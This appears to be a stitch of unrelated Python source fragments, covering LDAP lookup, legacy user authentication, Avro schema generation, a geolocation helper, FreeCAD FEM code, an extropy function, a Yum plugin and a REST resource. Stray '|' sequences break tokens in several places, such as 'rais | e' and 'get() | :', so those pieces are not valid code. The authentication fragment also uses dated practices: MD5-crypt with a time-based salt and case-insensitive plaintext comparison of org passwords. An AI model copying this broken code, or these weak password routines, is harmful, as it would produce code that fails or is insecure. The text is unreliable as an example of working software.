LOG.warn('Could not find %s in ldap attributes' % group_name_attr)
continue
group_name = data[group_name_attr][0]
if desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get() | :
group_name = group_name.lower()
ldap_info = {
'dn': dn,
'name': group_name
}
if group_member_attr in data and 'posixGroup' not in data['objectClass']:
ldap_info['members'] = data[group_member_attr]
else:
ldap_info['members'] = []
if 'posixGroup' in data['objectClass'] and 'memberUid' in data:
ldap_info['posix_members'] = data['memberUid']
else:
ldap_info['posix_members'] = []
group_info.append(ldap_info)
return group_info
def find_users(self, username_pattern, search_attr=None, user_name_attr=None, user_filter=None, find_by_dn=False, scope=ldap.SCOPE_SUBTREE):
"""
LDAP search helper method finding users. This supports searching for users
by distinguished name, or the configured username attribute.
:param username_pattern: The pattern to match ``search_attr`` against. Defaults to ``search_attr`` if none.
:param search_attr: The ldap attribute to search for ``username_pattern``. Defaults to LDAP -> USERS -> USER_NAME_ATTR config value.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:param find_by_dn: Search by distinguished name.
:param scope: ldapsearch scope.
:returns: List of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
``
"""
if not search_attr:
search_attr = self.ldap_config.USERS.USER_NAME_ATTR.get()
if not user_name_attr:
user_name_attr = search_attr
if not user_filter:
user_fil |
Note that if the user is only reserved we don't do PAM authentication
if data.get('use_pam_authentication') == 'Y' and CFG.pam_auth_service:
# Check the password with PAM
import rhnAuthPAM
if rhnAuthPAM.check_password(username, password, CFG.pam_auth_service) <= 0:
# Bad password
raise rhnFault(2)
# We don't care about the password anymore, replace it with something
import time
password = 'pam:%.8f' % time.time()
else:
# Regular authentication
if check_password(password, data["password"], data["old_password"]) == 0:
# Bad password
raise rhnFault(2)
# From this point on, the password may be encrypted
if encrypted_password:
password = encrypt_password(password)
is_real = 0
# the password matches, do we need to create a new entry?
if not data.has_key("id"):
user = User(username, password)
else: # we have to reload this entry into a User structure
user = User(username, password)
if not user.reload(data["id"]) == 0:
# something horked during reloading entry from database
# we can not really say that the entry does not exist...
raise rhnFault(10)
is_real = 1
# now we have user reloaded, check for updated email
if email:
# don't update the user's email address in the satellite context...
# we *must* in the live context, but user creation through up2date --register
# is disallowed in the satellite context anyway...
if not pre_existing_user:
user.set_info("email", email)
# XXX This should go away eventually
if org_id and org_password: # check out this org
h = rhnSQL.prepare("""
select id, password from web_customer
where id = :org_id
""")
h.execute(org_id=str(org_id))
data = h.fetchone_dict()
if not data: # wrong organization
raise rhnFault(2, _("Invalid Organization Credentials"))
# The org password is not encrypted, easy comparison
if string.lower(org_password) != string.lower(data["password"]):
# Invalid org password
raise rhnFault(2, _("Invalid Organization Credentials"))
if is_real: # this is a real entry, don't clobber the org_id
old_org_id = user.contact["org_id"]
new_org_id = data["id"]
if old_org_id != new_org_id:
raise rhnFault(42,
_("User `%s' not a member of organization %s") %
(username, org_id))
else: # new user, set its org
user.set_org_id(data["id"])
# force the save if this is a new entry
ret = user.save()
if not ret == 0:
raise rhnFault(5)
# check if we need to remove the reservation
if not data.has_key("id"):
# remove reservation
h = rhnSQL.prepare("""
delete from rhnUserReserved where login_uc = upper(:username)
""")
h.execute(username=username)
return 0
# Do some minimal checks on the data thrown our way
def check_user_password(username, password):
# username is required
if not username:
raise rhnFault(11)
# password is required
if not password:
raise rhnFault(12)
if len(username) < CFG.MIN_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters")
% CFG.MIN_USER_LEN)
if len(username) > CFG.MAX_USER_LEN:
raise rhnFault(700, _("username should be less than %d characters")
% CFG.MAX_USER_LEN)
username = username[:CFG.MAX_USER_LEN]
# Invalid characters
# ***NOTE*** Must coordinate with web and installer folks about any
# changes to this set of | characters!!!!
invalid_re = re.compile(".*[\s&+%'`\"=#]", re.I)
tmp = invalid_re.match(username)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15, _("username = `%s', invalid character `%s'") % (
username | , username[pos[1]-1]))
# use new password validation method
validate_new_password(password)
return username, password
# Do some minimal checks on the e-mail address
def check_email(email):
if email is not None:
email = string.strip(email)
if not email:
# Still supported
return None
if len(email) > CFG.MAX_EMAIL_LEN:
raise rhnFault(100, _("Please limit your e-mail address to %s chars") %
CFG.MAX_EMAIL_LEN)
# XXX More to come (check the format is indeed foo@bar.baz
return email
# Validates the given key against the current or old password
# If encrypted_password is false, it compares key with pwd1 and pwd2
# If encrypted_password is true, it compares the encrypted key
# with pwd1 and pwd2
#
# Historical note: we used to compare the passwords case-insensitive, and that
# was working fine until we started to encrypt passwords. -- misa 20030530
#
# Old password is no longer granting access -- misa 20040205
def check_password(key, pwd1, pwd2=None):
encrypted_password = CFG.encrypted_passwords
log_debug(4, "Encrypted password:", encrypted_password)
# We don't trust the origin for key, so stringify it
key = str(key)
if len(key) == 0:
# No zero-length passwords accepted
return 0
if not encrypted_password:
# Unencrypted passwords
if key == pwd1: # good password
return 1
log_debug(4, "Unencrypted password doesn't match")
return 0 # Invalid
# Crypted passwords in the database
if pwd1 == encrypt_password(key, pwd1):
# Good password
return 1
log_debug(4, "Encrypted password doesn't match")
return 0 # invalid
# Encrypt the key
# If no salt is supplied, generates one (md5-crypt salt)
def encrypt_password(key, salt=None):
# Case insensitive key
if not salt:
# No salt supplied, generate it ourselves
import base64
import time
import os
# Get the first 7 digits after the decimal point from time.time(), and
# add the pid too
salt = (time.time() % 1) * 1e7 + os.getpid()
# base64 it and keep only the first 8 chars
salt = base64.encodestring(str(salt))[:8]
# slap the magic in front of the salt
salt = "$1$%s$" % salt
salt = str(salt)
return crypt.crypt(key, salt)
# Perform all the checks required for new passwords
def validate_new_password(password):
log_debug(3, "Entered validate_new_password")
#
# We're copying the code because we don't want to
# invalidate any of the existing passwords.
#
# Validate password based on configurable length
# regular expression
if not password:
raise rhnFault(12)
if len(password) < CFG.MIN_PASSWD_LEN:
raise rhnFault(14, _("password must be at least %d characters")
% CFG.MIN_PASSWD_LEN)
if len(password) > CFG.MAX_PASSWD_LEN:
raise rhnFault(701, _("Password must be shorter than %d characters")
% CFG.MAX_PASSWD_LEN)
password = password[:CFG.MAX_PASSWD_LEN]
invalid_re = re.compile(
r"[^ A-Za-z0-9`!@#$%^&*()-_=+[{\]}\\|;:'\",<.>/?~]")
asterisks_re = re.compile(r"^\**$")
# make sure the password isn't all *'s
tmp = asterisks_re.match(password)
if tmp is not None:
raise rhnFault(15, "password cannot be all asterisks '*'")
# make sure we have only printable characters
tmp = invalid_re.search(password)
if tmp is not None:
pos = tmp.regs[0]
raise rhnFault(15,
_("password contains character `%s'") % password[pos[1]-1])
# Perform all the checks required for new usernames
def validate_new_username(username):
log_debug(3)
if len(username) < CFG.MIN_NEW_USER_LEN:
raise rhnFault(13, _("username should be at least %d characters long")
% CFG.MIN_NEW_USER_LEN)
disallowed_suffixes = CFG.DISALLOWED_SUFFIXES or [] |
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from random import choice, randint, random, shuffle
from os.path import join as join_path
from optparse import OptionParser
import json
MAX_NUM_STRUCT_FIELDS = 8
NULL_CHANCE = 0.5
SCALAR_TYPES = ['boolean', 'int', 'long', 'float', 'double', 'string']
class Node(object):
def __init__(self, num_fields, node_type):
self.node_type = node_type # one of struct, map, array
self.num_fields = num_fields
self.fields = []
class SchemaTreeGenerator(object):
def __init__(self, target_num_scalars=10, target_depth=3):
self._target_num_scalars = target_num_scalars
self._target_depth = target_depth
self._nodes = []
self._num_scalars_created = 0
self.root = None
def _create_random_node(self):
node_type = choice(('map', 'array', 'struct'))
if | node_type in ('map', 'array'):
result_node = Node(1, node_type)
else:
num_fields = randint(1, MAX_NUM_STRUCT_FIELDS)
self._num_scalars_created += num_fields - 1
result_node = Node(num_fields, 'struct')
self._nodes.append(result_node)
return | result_node
def _get_random_existing_node(self):
nodes = []
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
nodes.append(node)
return choice(nodes)
def _generate_rest(self):
while self._num_scalars_created < self._target_num_scalars:
node = self._get_random_existing_node()
node.fields.append(self._create_random_node())
self._finalize()
def _generate_trunk(self):
cur = self.root
for i in range(self._target_depth):
new_node = self._create_random_node()
self._nodes.append(new_node)
cur.fields.append(new_node)
cur = new_node
def _finalize(self):
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
node.fields.append(choice(SCALAR_TYPES))
shuffle(node.fields)
def create_tree(self):
self.root = Node(randint(1, MAX_NUM_STRUCT_FIELDS), 'struct')
self._nodes = [self.root]
self._num_scalars_created = self.root.num_fields
self._generate_trunk()
self._generate_rest()
return self.root
class AvroGenerator(object):
def __init__(self, schema_tree_generator):
self.cur_id = 0
self._schema_tree_generator = schema_tree_generator
def _next_id(self):
self.cur_id += 1
return str(self.cur_id)
def clear_state(self):
self.cur_id = 0
def create(self, table_name):
tree_root = self._schema_tree_generator.create_tree()
result = {}
result['type'] = 'record'
result['namespace'] = 'org.apache.impala'
result['name'] = table_name
result['fields'] = self._convert_struct_fields(tree_root.fields)
return result
def _convert_struct_fields(self, fields):
return [self._convert_struct_field(field) for field in fields]
def _convert_struct_field(self, struct_field_node):
result = {}
result['type'] = self._convert_node(struct_field_node)
result['name'] = 'field_' + self._next_id()
return result
def _convert_node(self, node):
if isinstance(node, str):
result = node
elif node.node_type == 'array':
result = self._convert_array(node)
elif node.node_type == 'map':
result = self._convert_map(node)
elif node.node_type == 'struct':
result = self._convert_struct(node)
else:
assert False, 'Unknown type: ' + node.node_types
if random() < NULL_CHANCE:
# Make it nullable
return ['null', result]
else:
return result
def _convert_array(self, array_node):
result = {}
result['type'] = 'array'
result['items'] = self._convert_node(array_node.fields[0])
return result
def _convert_map(self, map_node):
result = {}
result['type'] = 'map'
result['values'] = self._convert_node(map_node.fields[0])
return result
def _convert_struct(self, struct_node):
result = {}
result['type'] = 'record'
result['name'] = 'struct_' + self._next_id()
result['fields'] = self._convert_struct_fields(struct_node.fields)
return result
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('--target_dir', default='/tmp',
help='Directory where the avro schemas will be saved.')
parser.add_option('--num_tables', default='4', type='int',
help='Number of schemas to generate.')
parser.add_option('--num_scalars', default='10', type='int',
help='Number of schemas to generate.')
parser.add_option('--nesting_depth', default='3', type='int',
help='Number of schemas to generate.')
parser.add_option('--base_table_name', default='table_',
help='Base table name.')
options, args = parser.parse_args()
schema_generator = SchemaTreeGenerator(target_num_scalars=options.num_scalars,
target_depth=options.nesting_depth)
writer = AvroGenerator(schema_generator)
for table_num in range(options.num_tables):
writer.clear_state()
table_name = options.base_table_name + str(table_num)
json_result = writer.create(table_name)
file_path = join_path(options.target_dir, table_name + '.avsc')
with open(file_path, 'w') as f:
json.dump(json_result, f, indent=2, sort_keys=True)
|
def standard_text_from_block(block, offset, max_length):
str = ''
for i in range(offset, offset + max_length):
c = block[i]
if c == 0:
return str
else:
str += chr(c - 0x30)
return str
def standard_text_to_byte_list(text, max_length):
byte_list = []
text_pos = 0
while text_pos < len(text):
c = text[text_pos]
if c == '[':
end_bracket_pos = text.find(']', text_pos)
if end_bracket_pos == -1:
raise ValueError("String contains '[' at position {} but no subsequent ']': {}".format(
text_pos, text
))
bracket_bytes = text[text_pos+1:end_bracket_pos].split()
for bracket_byte in bracket_bytes:
if len(bracket_byte) != 2:
raise ValueError("String contains invalid hex number '{}', must be two digits: {}".format(
bracket_byte, text
))
try:
bracket_byte_value = int(bracket_byte, 16)
except ValueError as e:
raise ValueError("String contains invalid hex number '{}': {}".format(
bracket_byte, text
), e)
byte_list.append(bracket_byte_value)
text_pos = end_bracket_pos + 1
else:
byte_list.append(ord(c) + 0x30)
text_pos += 1
num_bytes = len(byte_list)
if num_bytes > max_length:
rais | e ValueError("String cannot be written in {} bytes or less: {}".format(
max | _length, text
))
elif num_bytes < max_length:
byte_list.append(0)
return byte_list
def standard_text_to_block(block, offset, text, max_length):
byte_list = standard_text_to_byte_list(text, max_length)
block[offset:offset+len(byte_list)] = byte_list |
INSTALL_PATH | = '/home/fred/workspace/ | grafeo/'
|
"""
Module with location helpers.
detect_location_info and elevation are mocked by default during tests.
"""
import asyncio
import collections
import math
from typing import Any, Dict, Optional, Tuple
import aiohttp
ELEVATION_URL = "https://api.open-elevation.com/api/v1/lookup"
IP_API = "http://ip-api.com/json"
IPAPI = "https://ipapi.co/json/"
# Constants from https://github.com/maurycyp/vincenty
# Earth ellipsoid according to WGS 84
# Axis a of the ellipsoid (Radius of the earth in meters)
AXIS_A = 6378137
# Flattening f = (a-b) / a
FLATTENING = 1 / 298.257223563
# Axis b of the ellipsoid in meters.
AXIS_B = 6356752.314245
MILES_PER_KILOMETER = 0.621371
MAX_ITERATIONS = 200
CONVERGENCE_THRESHOLD = 1e-12
LocationInfo = collections.namedtuple(
"LocationInfo",
[
"ip",
"country_code",
"country_name",
"region_code",
"region_name",
"city",
"zip_code",
"time_zone",
"latitude",
"longitude",
"use_metric",
],
)
async def async_detect_location_info(
session: aiohttp.ClientSession,
) -> Optional[LocationInfo]:
"""Detect location information."""
data = await _get_ipapi(session)
if data is None:
data = await _get_ip_api(session)
if data is None:
return None
data["use_metric"] = data["country_code"] not in ("US", "MM", "LR")
return LocationInfo(**data)
def distance(
lat1: Optional[float], lon1: Optional[float], lat2: float, lon2: float
) -> Optional[float]:
"""Calculate the distance in meters between two points.
Async friendly.
"""
if lat1 is None or lon1 is None:
return None
result = vincenty((lat1, lon1), (lat2, lon2))
if result is None:
return None
return result * 1000
# Author: https://github.com/maurycyp
# Source: https://github.com/maurycyp/vincenty
# License: https://github.com/maurycyp/vincenty/blob/master/LICENSE
# pylint: disable=invalid-name
def vincenty(
point1: Tuple[float, float], point2: Tuple[float, float], miles: bool = False
) -> Optional[float]:
"""
Vincenty formula (inverse method) to calculate the distance.
Result in kilometers or miles between two points on the surface of a
spheroid.
Async friendly.
"""
# short-circuit coincident points
if point1[0] == point2[0] and point1[1] == point2[1]:
return 0.0
U1 = math.atan((1 - FLATTENING) * math.tan(math.radians(point1[0])))
U2 = math.atan((1 - FLATTENING) * math.tan(math.radians(point2[0])))
L = math.radians(point2[1] - point1[1])
Lambda = L
sinU1 = math.sin(U1)
cosU1 = math.cos(U1)
sinU2 = math.sin(U2)
cosU2 = math.cos(U2)
for _ in range(MAX_ITERATIONS):
sinLambda = math.sin(Lambda)
cosLambda = math.cos(Lambda)
sinSigma = math.sqrt(
(cosU2 * sinLambda) ** 2 + (cosU1 * sinU2 - sinU1 * cosU2 * cosLambda) ** 2
)
if sinSigma == 0.0:
return 0.0 # coincident points
cosSigma = sinU1 * sinU2 + cosU1 * cosU2 * cosLambda
sigma = math.atan2(sinSigma, cosSigma)
sinAlpha = cosU1 * cosU2 * sinLambda / sinSigma
cosSqAlpha = 1 - sinAlpha ** 2
try:
cos2SigmaM = cosSigma - 2 * sinU1 * sinU2 / cosSqAlpha
except ZeroDivisionError:
cos2SigmaM = 0
C = FLATTENING / 16 * cosSqAlpha * (4 + FLATTENING * (4 - 3 * cosSqAlpha))
LambdaPrev = Lambda
Lambda = L + (1 - C) * FLATTENING * sinAlpha * (
sigma
+ C * sinSigma * (cos2SigmaM + C * cosSigma * (-1 + 2 * cos2SigmaM ** 2))
)
if abs(Lambda - LambdaPrev) < CONVERGENCE_THRESHOLD:
break # successful convergence
else:
return None # failure to converge
uSq = cosSqAlpha * (AXIS_A ** 2 - AXIS_B ** 2) / (AXIS_B ** 2)
A = 1 + uSq / 16384 * (4096 + uSq * (-768 + uSq * (320 - 175 * uSq)))
B = uSq / 1024 * (256 + uSq * (-128 + uSq * (74 - 47 * uSq)))
deltaSigma = (
B
* sinSigma
* (
cos2SigmaM
+ B
/ 4
* (
cosSigma * (-1 + 2 * cos2SigmaM ** 2)
- B
/ 6
* cos2SigmaM
* (-3 + 4 * sinSigma ** 2)
* (-3 + 4 * cos2SigmaM ** 2)
)
)
)
s = AXIS_B * A * (sigma - deltaSigma)
s /= 1000 # Conversion of meters to kilometers
if miles:
s *= MILES_PER_KILOMETER # kilometers to miles
return round(s, 6)
async def _get_ipapi(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ipapi.co for location data."""
try:
resp = await session.get(IPAPI, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.jso | n()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("ip"),
"country_code": raw_info.get("country"),
"country_name": raw_info.get("country_name"),
"region_code": raw_info.get("region_code"),
"region_name": raw_info.get("region"),
"city": | raw_info.get("city"),
"zip_code": raw_info.get("postal"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("latitude"),
"longitude": raw_info.get("longitude"),
}
async def _get_ip_api(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ip-api.com for location data."""
try:
resp = await session.get(IP_API, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("query"),
"country_code": raw_info.get("countryCode"),
"country_name": raw_info.get("country"),
"region_code": raw_info.get("region"),
"region_name": raw_info.get("regionName"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("zip"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("lat"),
"longitude": raw_info.get("lon"),
}
|
# Copyright (C) 2015 Google Inc., authors, and contributor | s <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: jernej@reciprocitylabs.com
# Maintained By: jernej@reciprocitylabs.com
from lib import environment
from lib.constants import url
from lib.page.widget.base import Widget
class AdminPeople(Wi | dget):
URL = environment.APP_URL \
+ url.ADMIN_DASHBOARD \
+ url.Widget.PEOPLE
|
er the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
'''
- next step would be save the constraints node and element data in the in the FreeCAD FEM Mesh Object
and link them to the appropriate constraint object
- if the informations are used by the FEM Mesh file exporter FreeCAD would support writing FEM Mesh Groups
- which is a most needed feature of FEM module
- smesh supports mesh groups, how about pythonbinding in FreeCAD. Is there somethin implemented allready?
'''
__title__ = "FemInputWriter"
__author__ = "Bernd Hahnebach"
__url__ = "http://www.freecadweb.org"
import FreeCAD
import FemMeshTools
import os
class FemInputWriter():
def __init__(self,
analysis_obj, solver_obj,
mesh_obj, matlin_obj, matnonlin_obj,
fixed_obj, displacement_obj,
contact_obj, planerotation_obj, transform_obj,
selfweight_obj, force_obj, pressure_obj,
temperature_obj, heatflux_obj, initialtemperature_obj,
beamsection_obj, shellthickness_obj,
analysis_type, dir_name
):
self.analysis = analysis_obj
self.solver_obj = solver_obj
self.mesh_object = mesh_obj
self.material_objects = matlin_obj
self.material_nonlinear_objects = matnonlin_obj
self.fixed_objects = fixed_obj
self.displacement_objects = displacement_obj
self.contact_objects = contact_obj
self.planerotation_objects = planerotation_obj
self.transform_objects = transform_obj
self.selfweight_objects = selfweight_obj
self.force_objects = force_obj
self.pressure_objects = pressure_obj
self.temperature_objects = temperature_obj
self.heatfl | ux_objects = heatflux_obj
self.initialtemperature_objects = initialtemperature_obj
self.beamsection_objects = beamsection_obj
self.shellthickness_objects = shellthickness_obj
self.analysis_type = anal | ysis_type
self.dir_name = dir_name
if not dir_name:
print('Error: FemInputWriter has no working_dir --> we gone make a temporary one!')
self.dir_name = FreeCAD.ActiveDocument.TransientDir.replace('\\', '/') + '/FemAnl_' + analysis_obj.Uid[-4:]
if not os.path.isdir(self.dir_name):
os.mkdir(self.dir_name)
self.fc_ver = FreeCAD.Version()
self.ccx_eall = 'Eall'
self.ccx_elsets = []
self.femmesh = self.mesh_object.FemMesh
self.femnodes_mesh = {}
self.femelement_table = {}
self.constraint_conflict_nodes = []
def get_constraints_fixed_nodes(self):
# get nodes
for femobj in self.fixed_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_displacement_nodes(self):
# get nodes
for femobj in self.displacement_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
# add nodes to constraint_conflict_nodes, needed by constraint plane rotation
for node in femobj['Nodes']:
self.constraint_conflict_nodes.append(node)
def get_constraints_planerotation_nodes(self):
# get nodes
for femobj in self.planerotation_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_transform_nodes(self):
# get nodes
for femobj in self.transform_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_temperature_nodes(self):
# get nodes
for femobj in self.temperature_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
femobj['Nodes'] = FemMeshTools.get_femnodes_by_femobj_with_references(self.femmesh, femobj)
def get_constraints_force_nodeloads(self):
# check shape type of reference shape
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
# in GUI defined frc_obj all ref_shape have the same shape type
# TODO in FemTools: check if all RefShapes really have the same type an write type to dictionary
femobj['RefShapeType'] = ''
if frc_obj.References:
first_ref_obj = frc_obj.References[0]
first_ref_shape = first_ref_obj[0].Shape.getElement(first_ref_obj[1][0])
femobj['RefShapeType'] = first_ref_shape.ShapeType
else:
# frc_obj.References could be empty ! # TODO in FemTools: check
FreeCAD.Console.PrintError('At least one Force Object has empty References!\n')
if femobj['RefShapeType'] == 'Vertex':
# print("load on vertices --> we do not need the femelement_table and femnodes_mesh for node load calculation")
pass
elif femobj['RefShapeType'] == 'Face' and FemMeshTools.is_solid_femmesh(self.femmesh) and not FemMeshTools.has_no_face_data(self.femmesh):
# print("solid_mesh with face data --> we do not need the femelement_table but we need the femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
else:
# print("mesh without needed data --> we need the femelement_table and femnodes_mesh for node load calculation")
if not self.femnodes_mesh:
self.femnodes_mesh = self.femmesh.Nodes
if not self.femelement_table:
self.femelement_table = FemMeshTools.get_femelement_table(self.femmesh)
# get node loads
for femobj in self.force_objects: # femobj --> dict, FreeCAD document object is femobj['Object']
frc_obj = femobj['Object']
if frc_obj.Force == 0:
print(' Warning --> Force = 0')
if femobj['RefShapeType'] == 'Vertex': # point load on vertieces
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_vertex_nodeload_table(self.femmesh, frc_obj)
elif femobj['RefShapeType'] == 'Edge': # line load on edges
femobj['NodeLoadTable'] = FemMeshTools.get_force_obj_edge_nodeload_table(self.femmesh, self.femelement_table, self.femnodes_mesh, frc_o |
"""
The extropy
"""
from ..helpers import RV_MODES
from ..math.ops import get_ops
import numpy as np
def extropy(dist, rvs=None, rv_mode=None):
"""
Returns the extropy J[X] over the random variables in `rvs`.
If the distribution represents linear probabilities, then the extropy
is calculated with units of 'bits' (base-2).
Parameters
----------
dist : Distribution or float
The distribution from which the extropy is calculated. If a float,
then we calculate the binary extropy.
rvs : list, None
The indexes of the random variable used to calculate the extropy.
If None, then the extropy is calculated over all random variables.
This should remain `None` for ScalarDistributions.
rv_mode : str, None
Specifies how to interpret the elements of `rvs`. Valid options are:
{'indices', 'names'}. If equal to 'indices', then the elements of
`rvs` are interpreted as random variable indices. If equal to 'names',
the the elements are interpreted as random variable names. If `None`,
then the value of `dist._rv_mode` is consulted.
Returns
-------
J : float
The extropy of the distribution.
"""
try:
| # Handle binary extropy.
float(dist)
except TypeError:
pass
else:
# Assume linear probability for binary extropy.
import dit
dist = dit.ScalarDistribution([dist, 1-dist])
rvs = None
rv_mode = RV_MODES.INDICES
if dist.is_joint(): |
if rvs is None:
# Set to entropy of entire distribution
rvs = list(range(dist.outcome_length()))
rv_mode = RV_MODES.INDICES
d = dist.marginal(rvs, rv_mode=rv_mode)
else:
d = dist
pmf = d.pmf
if d.is_log():
base = d.get_base(numerical=True)
npmf = d.ops.log(1-d.ops.exp(pmf))
terms = -base**npmf * npmf
else:
# Calculate entropy in bits.
log = get_ops(2).log
npmf = 1 - pmf
terms = -npmf * log(npmf)
J = np.nansum(terms)
return J
|
# Yum plugin to re-patch container rootfs after a yum update is done
#
# Copyright (C) 2012 Oracle
#
# Authors:
# Dwight Engen <dwight.engen@oracle.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
import os
from fnmatch import fnmatch
from yum.plugins import TYPE_INTERACTIVE
from yum.plugins import PluginYumExit
requires_api_version = '2.0'
plugin_type = (TYPE_INTERACTIVE,)
def posttrans_hook(conduit):
pkgs = []
patch_required = False
# If we aren't root, we can't have updated anything
if os.geteuid():
| return
# See what packages have files that were patched
confpkgs = conduit.confString('main', 'packages')
if not confpkgs:
return
tmp = confpkgs.split(",")
for confpkg in tmp:
pkgs.append(confpkg.strip())
conduit.info(2, "lxc-patch: checking if updated pkgs need patching...")
ts = conduit.getTsInfo()
for tsmem in ts.getMembers():
for pkg in pkgs:
if fnmatch(pkg, tsmem.po.name):
patch_required = True
if pa | tch_required:
conduit.info(2, "lxc-patch: patching container...")
os.spawnlp(os.P_WAIT, "lxc-patch", "lxc-patch", "--patch", "/")
|
# -*- coding: utf-8 -*-
#
# SPDX-License-Identifier: AGPL-3.0-or-later
#
# snippy - software development and maintenance notes manager.
# Copyright 2017-2020 Heikki J. Laaksonen <laaksonen.heikki.j@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""api_fields: JSON REST API for resource attributes."""
from snippy.cause import Cause
from snippy.config.config import Config
fro | m snippy.config.source.api import Api
from snippy.constants import Constants as Const
from snippy.logger import Logger
from snippy.server.rest.base import ApiResource
from snippy.server.rest.base import ApiNo | tImplemented
from snippy.server.rest.generate import Generate
class ApiAttributes(object):
"""Access unique resource attributes."""
def __init__(self, content):
self._logger = Logger.get_logger(__name__)
self._category = content.category
self._content = content
@Logger.timeit(refresh_oid=True)
def on_get(self, request, response):
"""Search unique resource attributes.
Search is made from all content categories by default.
Args:
request (obj): Falcon Request().
response (obj): Falcon Response().
"""
self._logger.debug('run: %s %s', request.method, request.uri)
if 'scat' not in request.params:
request.params['scat'] = Const.CATEGORIES
api = Api(self._category, Api.UNIQUE, request.params)
Config.load(api)
self._content.run()
if not self._content.uniques:
Cause.push(Cause.HTTP_NOT_FOUND, 'cannot find unique fields for %s attribute' % self._category)
if Cause.is_ok():
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.fields(self._category, self._content.uniques, request, response)
response.status = Cause.http_status()
else:
response.content_type = ApiResource.MEDIA_JSON_API
response.body = Generate.error(Cause.json_message())
response.status = Cause.http_status()
Cause.reset()
self._logger.debug('end: %s %s', request.method, request.uri)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_post(request, response):
"""Create new field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_put(request, response):
"""Change field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_delete(request, response):
"""Delete field."""
ApiNotImplemented.send(request, response)
@staticmethod
@Logger.timeit(refresh_oid=True)
def on_options(_, response):
"""Respond with allowed methods."""
response.status = Cause.HTTP_200
response.set_header('Allow', 'GET,OPTIONS')
|
t.raises(IllegalValueError):
validator.coerce_boolean(value, ['whatever'])
@pytest.mark.parametrize(
'value, expected',
[
('3', 3.0),
('9.80', 9.80),
('3.141592654', 3.141592654),
('"3.141592654"', 3.141592654),
